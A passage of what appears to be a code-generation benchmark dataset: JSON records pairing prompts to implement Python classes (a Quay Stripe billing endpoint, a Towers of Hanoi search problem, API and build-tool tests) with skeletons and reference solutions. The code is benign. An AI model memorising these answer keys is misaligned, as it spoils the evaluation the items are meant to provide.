<|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\n raise Unauthorized()\n<|end_body_0|>\n\n<|body_start_1|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\n raise Unauthorized()\n<|end_body_1|>\n\n<|body_start_2|>\n cus = None\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\n raise Unauthorized()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000288", "length_bytes": 33890, "license_type": "permissive", "methods": [{"docstring": "Create the org's subscription. Returns a Stripe checkout session.", "name": "post", "signature": "def post(self, orgname)"}, {"docstring": "Update the org's subscription.", "name": "put", "signature": "def put(self, orgname)"}, {"docstring": "Fetch any existing subscription for the org.", "name": "get", "signature": "def get(self, orgname)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005221", "prompt": "Implement the Python class `OrganizationPlan` described below.\n\nClass description:\nResource for managing a org's subscription.\n\nMethod signatures and docstrings:\n- def post(self, orgname): Create the org's subscription. Returns a Stripe checkout session.\n- def put(self, orgname): Update the org's subscription.\n- def get(self, orgname): Fetch any existing subscription for the org.", "prompted_full_text": "Implement the Python class `OrganizationPlan` described below.\n\nClass description:\nResource for managing a org's subscription.\n\nMethod signatures and docstrings:\n- def post(self, orgname): Create the org's subscription. Returns a Stripe checkout session.\n- def put(self, orgname): Update the org's subscription.\n- def get(self, orgname): Fetch any existing subscription for the org.\n\n<|skeleton|>\nclass OrganizationPlan:\n \"\"\"Resource for managing a org's subscription.\"\"\"\n\n def post(self, orgname):\n \"\"\"Create the org's subscription. Returns a Stripe checkout session.\"\"\"\n <|body_0|>\n\n def put(self, orgname):\n \"\"\"Update the org's subscription.\"\"\"\n <|body_1|>\n\n def get(self, orgname):\n \"\"\"Fetch any existing subscription for the org.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\n raise Unauthorized()\n<|end_body_0|>\n\n<|body_start_1|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\n raise Unauthorized()\n<|end_body_1|>\n\n<|body_start_2|>\n cus = None\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\n raise Unauthorized()\n<|end_body_2|>\n", "revision_id": "e400a0c22c5f89dd35d571654b13d262b1f6e3b3", "skeleton": "<|skeleton|>\nclass OrganizationPlan:\n \"\"\"Resource for managing a org's subscription.\"\"\"\n\n def post(self, orgname):\n \"\"\"Create the org's subscription. Returns a Stripe checkout session.\"\"\"\n <|body_0|>\n\n def put(self, orgname):\n \"\"\"Update the org's subscription.\"\"\"\n <|body_1|>\n\n def get(self, orgname):\n \"\"\"Fetch any existing subscription for the org.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OrganizationPlan:\n \"\"\"Resource for managing a org's subscription.\"\"\"\n\n def post(self, orgname):\n \"\"\"Create the org's subscription. Returns a Stripe checkout session.\"\"\"\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\n raise Unauthorized()\n\n def put(self, orgname):\n \"\"\"Update the org's subscription.\"\"\"\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\n raise Unauthorized()\n\n def get(self, orgname):\n \"\"\"Fetch any existing subscription for the org.\"\"\"\n cus = None\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\n raise Unauthorized()\n", "source": "the_stack_v2_python_sparse", "source_path": "endpoints/api/billing.py", "source_repo": "quay/quay", "split": "test", "star_events_count": 2363} {"blob_id": "67fd831f1197a211997631f61c2245784e5b6891", "bodies": ["self.initial = initial\nif goal is not None:\n self.goal = goal\nelse:\n self.goal = sorted(self.initial[0], reverse=True)\nassert len(initial) == 3\nself.pegs = [i for i in range(0, len(initial))]\nself.sentinel = self.initial[0][0] + 1\nfor peg in self.initial:\n peg.insert(0, self.sentinel)\nself.goal.insert(0, self.sentinel)\nself.nodesTouched = 0\nself.largestFrontier = 0\nself.visited = dict()", "def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\nactions = []\ntops = [peg[-1] for peg in state]\nidxSmallest = tops.index(1)\nmoveSmallTo = list(self.pegs)\nmoveSmallTo.remove(idxSmallest)\nnextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\nidxNextSmall = tops.index(nextSmall)\nfor move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\nif nextSmall is self.sentinel:\n return actions\nelse:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions", "result = [peg[:] for peg in state]\nvalue = result[action.src].pop()\nassert value == action.value\nif value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\nresult[action.dest].append(value)\nreturn result", "if state[0][-1] != self.sentinel:\n return False\nif state[2] == self.goal:\n return True\nreturn False"], "bodies_text": "<|body_start_0|>\n self.initial = initial\n if goal is not None:\n self.goal = goal\n else:\n self.goal = sorted(self.initial[0], reverse=True)\n assert len(initial) == 3\n self.pegs = [i for i in range(0, len(initial))]\n self.sentinel = self.initial[0][0] + 1\n for peg in self.initial:\n peg.insert(0, self.sentinel)\n self.goal.insert(0, self.sentinel)\n self.nodesTouched = 0\n self.largestFrontier = 0\n self.visited = dict()\n<|end_body_0|>\n\n<|body_start_1|>\n def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\n actions = []\n tops = [peg[-1] for peg in state]\n idxSmallest = tops.index(1)\n moveSmallTo = list(self.pegs)\n moveSmallTo.remove(idxSmallest)\n nextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\n idxNextSmall = tops.index(nextSmall)\n for move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\n if nextSmall is self.sentinel:\n return actions\n else:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions\n<|end_body_1|>\n\n<|body_start_2|>\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n assert value == action.value\n if value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\n result[action.dest].append(value)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n if state[0][-1] != self.sentinel:\n return False\n if state[2] == self.goal:\n return True\n return False\n<|end_body_3|>\n", "class_docstring": "This is where the problem is defined. Initial state, goal state and other information that can be got from the problem", "class_name": "Problem", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Problem:\n \"\"\"This is where the problem is defined. Initial state, goal state and other information that can be got from the problem\"\"\"\n\n def __init__(self, initial, goal=None):\n \"\"\"This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\"\"\"\n <|body_0|>\n\n def actions(self, state):\n \"\"\"Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\"\"\"\n <|body_1|>\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\"\"\"\n <|body_2|>\n\n def goal_test(self, state):\n \"\"\"Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.initial = initial\n if goal is not None:\n self.goal = goal\n else:\n self.goal = sorted(self.initial[0], reverse=True)\n assert len(initial) == 3\n self.pegs = [i for i in range(0, len(initial))]\n self.sentinel = self.initial[0][0] + 1\n for peg in self.initial:\n peg.insert(0, self.sentinel)\n self.goal.insert(0, self.sentinel)\n self.nodesTouched = 0\n self.largestFrontier = 0\n self.visited = dict()\n<|end_body_0|>\n\n<|body_start_1|>\n def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\n actions = []\n tops = [peg[-1] for peg in state]\n idxSmallest = tops.index(1)\n moveSmallTo = list(self.pegs)\n moveSmallTo.remove(idxSmallest)\n nextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\n idxNextSmall = tops.index(nextSmall)\n for move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\n if nextSmall is self.sentinel:\n return actions\n else:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions\n<|end_body_1|>\n\n<|body_start_2|>\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n assert value == action.value\n if value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\n result[action.dest].append(value)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n if state[0][-1] != self.sentinel:\n return False\n if state[2] == self.goal:\n return True\n return False\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000289", "length_bytes": 21082, "license_type": "no_license", "methods": [{"docstring": "This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises", "name": "__init__", "signature": "def __init__(self, initial, goal=None)"}, {"docstring": "Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.", "name": "actions", "signature": "def actions(self, state)"}, {"docstring": "Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).", "name": "result", "signature": "def result(self, state, action)"}, {"docstring": "Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students", "name": "goal_test", "signature": "def goal_test(self, state)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000461", "prompt": "Implement the Python class `Problem` described below.\n\nClass description:\nThis is where the problem is defined. Initial state, goal state and other information that can be got from the problem\n\nMethod signatures and docstrings:\n- def __init__(self, initial, goal=None): This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\n- def actions(self, state): Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\n- def result(self, state, action): Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\n- def goal_test(self, state): Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students", "prompted_full_text": "Implement the Python class `Problem` described below.\n\nClass description:\nThis is where the problem is defined. Initial state, goal state and other information that can be got from the problem\n\nMethod signatures and docstrings:\n- def __init__(self, initial, goal=None): This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\n- def actions(self, state): Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\n- def result(self, state, action): Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\n- def goal_test(self, state): Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\n\n<|skeleton|>\nclass Problem:\n \"\"\"This is where the problem is defined. Initial state, goal state and other information that can be got from the problem\"\"\"\n\n def __init__(self, initial, goal=None):\n \"\"\"This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\"\"\"\n <|body_0|>\n\n def actions(self, state):\n \"\"\"Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\"\"\"\n <|body_1|>\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\"\"\"\n <|body_2|>\n\n def goal_test(self, state):\n \"\"\"Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.initial = initial\n if goal is not None:\n self.goal = goal\n else:\n self.goal = sorted(self.initial[0], reverse=True)\n assert len(initial) == 3\n self.pegs = [i for i in range(0, len(initial))]\n self.sentinel = self.initial[0][0] + 1\n for peg in self.initial:\n peg.insert(0, self.sentinel)\n self.goal.insert(0, self.sentinel)\n self.nodesTouched = 0\n self.largestFrontier = 0\n self.visited = dict()\n<|end_body_0|>\n\n<|body_start_1|>\n def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\n actions = []\n tops = [peg[-1] for peg in state]\n idxSmallest = tops.index(1)\n moveSmallTo = list(self.pegs)\n moveSmallTo.remove(idxSmallest)\n nextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\n idxNextSmall = tops.index(nextSmall)\n for move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\n if nextSmall is self.sentinel:\n return actions\n else:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions\n<|end_body_1|>\n\n<|body_start_2|>\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n assert value == action.value\n if value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\n result[action.dest].append(value)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n if state[0][-1] != self.sentinel:\n return False\n if state[2] == self.goal:\n return True\n return False\n<|end_body_3|>\n", "revision_id": "a283d50eff1d0e7c158479ddc8e17932d518104a", "skeleton": "<|skeleton|>\nclass Problem:\n \"\"\"This is where the problem is defined. Initial state, goal state and other information that can be got from the problem\"\"\"\n\n def __init__(self, initial, goal=None):\n \"\"\"This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\"\"\"\n <|body_0|>\n\n def actions(self, state):\n \"\"\"Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\"\"\"\n <|body_1|>\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\"\"\"\n <|body_2|>\n\n def goal_test(self, state):\n \"\"\"Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Problem:\n \"\"\"This is where the problem is defined. Initial state, goal state and other information that can be got from the problem\"\"\"\n\n def __init__(self, initial, goal=None):\n \"\"\"This is the constructor for the Problem class. It specifies the initial state, and possibly a goal state, if there is a unique goal. You can add other arguments if the need arises\"\"\"\n self.initial = initial\n if goal is not None:\n self.goal = goal\n else:\n self.goal = sorted(self.initial[0], reverse=True)\n assert len(initial) == 3\n self.pegs = [i for i in range(0, len(initial))]\n self.sentinel = self.initial[0][0] + 1\n for peg in self.initial:\n peg.insert(0, self.sentinel)\n self.goal.insert(0, self.sentinel)\n self.nodesTouched = 0\n self.largestFrontier = 0\n self.visited = dict()\n\n def actions(self, state):\n \"\"\"Return the actions that can be executed in the given state. The result would typically be a list, but if there are many actions, consider yielding them one at a time in an iterator, rather than building them all at once.\"\"\"\n def check(action):\n \"\"\"Check to see if we'll end up in a loop by applying the action.\n \"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n result[action.dest].append(value)\n if str(result) in self.visited:\n return False\n return True\n actions = []\n tops = [peg[-1] for peg in state]\n idxSmallest = tops.index(1)\n moveSmallTo = list(self.pegs)\n moveSmallTo.remove(idxSmallest)\n nextSmall = min(tops[moveSmallTo[0]], tops[moveSmallTo[1]])\n idxNextSmall = tops.index(nextSmall)\n for move in moveSmallTo:\n action = Action(idxSmallest, move, 1)\n if check(action):\n actions.append(action)\n if nextSmall is self.sentinel:\n return actions\n else:\n moveSmallTo.remove(idxNextSmall)\n assert len(moveSmallTo) == 1\n action = Action(idxNextSmall, moveSmallTo[0], nextSmall)\n if check(action):\n actions.append(action)\n return actions\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given action in the given state. The action must be one of self.actions(state).\"\"\"\n result = [peg[:] for peg in state]\n value = result[action.src].pop()\n assert value == action.value\n if value is self.sentinel:\n raise ValueError('Attempted to Move Sentinel Value')\n result[action.dest].append(value)\n return result\n\n def goal_test(self, state):\n \"\"\"Return True if the state is a goal. The default method compares the state to self.goal, as specified in the constructor. Override this method if checking against a single self.goal is not enough. This must be written by students\"\"\"\n if state[0][-1] != self.sentinel:\n return False\n if state[2] == self.goal:\n return True\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "4511W-Intro_To_Artificial_Intelligence/Course_Project_Towers_of_Hanoi/hanoi.py", "source_repo": "marvintv/apollo-academia-umn", "split": "test", "star_events_count": 0} {"blob_id": "6f11a93820d1f8f053b07934b0238a3ba8a4af93", "bodies": ["response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\nevents = response.json()\nself.assertEqual(response.status_code, status.HTTP_200_OK)\nself.assertEqual(response.headers['Content-Type'], 'application/json')\nself.assertGreater(len(events), 1)", "response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\nevents = response.json()\nself.assertEqual(response.status_code, status.HTTP_200_OK)\nself.assertEqual(events['title'], 'SYSTEMS Coffee')"], "bodies_text": "<|body_start_0|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.headers['Content-Type'], 'application/json')\n self.assertGreater(len(events), 1)\n<|end_body_0|>\n\n<|body_start_1|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(events['title'], 'SYSTEMS Coffee')\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SamoaTests", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SamoaTests:\n\n def test_connection_to_samoa_api(self):\n \"\"\"Tests whether a connection to samoa is successful.\"\"\"\n <|body_0|>\n\n def test_17012_returns_systems_coffee(self):\n \"\"\"Tests whether the event with id 17012 returns the correct seminar.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.headers['Content-Type'], 'application/json')\n self.assertGreater(len(events), 1)\n<|end_body_0|>\n\n<|body_start_1|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(events['title'], 'SYSTEMS Coffee')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000290", "length_bytes": 13057, "license_type": "permissive", "methods": [{"docstring": "Tests whether a connection to samoa is successful.", "name": "test_connection_to_samoa_api", "signature": "def test_connection_to_samoa_api(self)"}, {"docstring": "Tests whether the event with id 17012 returns the correct seminar.", "name": "test_17012_returns_systems_coffee", "signature": "def test_17012_returns_systems_coffee(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003678", "prompt": "Implement the Python class `SamoaTests` described below.\n\nClass description:\nImplement the SamoaTests class.\n\nMethod signatures and docstrings:\n- def test_connection_to_samoa_api(self): Tests whether a connection to samoa is successful.\n- def test_17012_returns_systems_coffee(self): Tests whether the event with id 17012 returns the correct seminar.", "prompted_full_text": "Implement the Python class `SamoaTests` described below.\n\nClass description:\nImplement the SamoaTests class.\n\nMethod signatures and docstrings:\n- def test_connection_to_samoa_api(self): Tests whether a connection to samoa is successful.\n- def test_17012_returns_systems_coffee(self): Tests whether the event with id 17012 returns the correct seminar.\n\n<|skeleton|>\nclass SamoaTests:\n\n def test_connection_to_samoa_api(self):\n \"\"\"Tests whether a connection to samoa is successful.\"\"\"\n <|body_0|>\n\n def test_17012_returns_systems_coffee(self):\n \"\"\"Tests whether the event with id 17012 returns the correct seminar.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.headers['Content-Type'], 'application/json')\n self.assertGreater(len(events), 1)\n<|end_body_0|>\n\n<|body_start_1|>\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(events['title'], 'SYSTEMS Coffee')\n<|end_body_1|>\n", "revision_id": "c8330258778dd7f71b1289c5dfe611e5637cf71d", "skeleton": "<|skeleton|>\nclass SamoaTests:\n\n def test_connection_to_samoa_api(self):\n \"\"\"Tests whether a connection to samoa is successful.\"\"\"\n <|body_0|>\n\n def test_17012_returns_systems_coffee(self):\n \"\"\"Tests whether the event with id 17012 returns the correct seminar.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SamoaTests:\n def test_connection_to_samoa_api(self):\n \"\"\"Tests whether a connection to samoa is successful.\"\"\"\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/searchtext?search=')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.headers['Content-Type'], 'application/json')\n self.assertGreater(len(events), 1)\n\n def test_17012_returns_systems_coffee(self):\n \"\"\"Tests whether the event with id 17012 returns the correct seminar.\"\"\"\n response = requests.get('https://samoa.dcs.gla.ac.uk/events/rest/Event/17012')\n events = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(events['title'], 'SYSTEMS Coffee')\n", "source": "the_stack_v2_python_sparse", "source_path": "seminar-roulette/backend/tests.py", "source_repo": "olliegardner/seminar-roulette", "split": "test", "star_events_count": 0} {"blob_id": "5d5b6af451342ee167eadfd89e9e23079211da7d", "bodies": ["self.assertDirectoryContents(['produce.ini', 'Makefile'])\nwith self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\nself.assertEqual(len(l.output), 4)\nself.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])", "self.assertDirectoryContents(['produce.ini', 'Makefile'])\nwith self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\nself.assertEqual(len(l.output), 2)\nself.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])", "self.assertDirectoryContents(['produce.ini', 'Makefile'])\nwith self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\nself.assertEqual(len(l.output), 2)\nself.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])", "self.assertDirectoryContents(['produce.ini', 'Makefile'])\nwith self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\nself.assertEqual(len(l.output), 2)\nself.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])"], "bodies_text": "<|body_start_0|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 4)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])\n<|end_body_1|>\n\n<|body_start_2|>\n 